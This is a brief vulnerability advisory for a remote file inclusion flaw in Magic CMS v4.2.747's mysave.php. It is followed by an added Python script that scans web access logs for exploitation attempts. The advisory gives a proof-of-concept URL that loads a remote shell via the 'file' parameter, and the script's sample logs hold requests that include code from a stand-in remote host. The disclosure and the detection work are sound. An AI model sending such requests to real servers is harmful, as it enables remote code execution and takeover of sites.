vendor: Magic CMS
by: DNX
N/A
CVSS
N/A
Remote File Inclusion
CWE
Product Name: Magic CMS
Affected Version From: Magic CMS v4.2.747
Affected Version To: Magic CMS v4.2.747
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Magic CMS v4.2.747 (mysave.php) Remote File Inclusion
The vulnerability is in the mysave.php file of Magic CMS v4.2.747. An attacker can include a remote file by manipulating the 'file' parameter in the URL. It can only be exploited when the 'register_globals' setting is turned on. The vulnerability was discovered by DNX and reported on 03.03.2007. The PoC URL for this vulnerability is 'http://[site]/[path]/mysave.php?file=[shell]'. The vendor, www.geo-soft.net/de-ch/, has not provided a patch or update for this vulnerability.
Mitigation:
Waiting for patch/update. No response from vendor.
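With no patch available, web server access logs can be checked for requests that match the pattern described above. The following is an added example, not part of the original advisory or of Magic CMS: it assumes combined-format access logs, and the function name, sample log lines, addresses and hosts are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A value starting with scheme:// (http, https, ftp, php, ...) or data: is a URL,
# not a local path
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)


def flag_rfi_attempts(lines, script="mysave.php", param="file"):
    """Return (client_ip, decoded_value) for requests passing a URL in `param` to `script`."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # Decode the path too, so an encoded script name is still recognised
        if not unquote(url.path).lower().endswith("/" + script):
            continue
        # parse_qsl percent-decodes once, as PHP does before filling its variables
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == param and REMOTE_RE.match(value):
                hits.append((line.split()[0], value))
    return hits


# Constructed sample log lines (documentation addresses and hosts, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Mar/2007:10:00:01 +0000] '
    '"GET /cms/mysave.php?file=notes.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [03/Mar/2007:10:00:05 +0000] '
    '"GET /cms/mysave.php?file=http://remote.example/x.txt HTTP/1.1" 200 0',
    '198.51.100.7 - - [03/Mar/2007:10:00:09 +0000] '
    '"GET /cms/mysave.php?file=http%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 0',
    '203.0.113.4 - - [03/Mar/2007:10:01:00 +0000] '
    '"GET /cms/index.php?file=http://remote.example/x.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, value in flag_rfi_attempts(SAMPLE_LOG):
        print(f"possible remote file inclusion attempt from {ip}: file={value}")
```

Access logs record only the request line, and register_globals also fills variables from POST bodies and cookies, so a clean result here does not rule out attempts delivered that way.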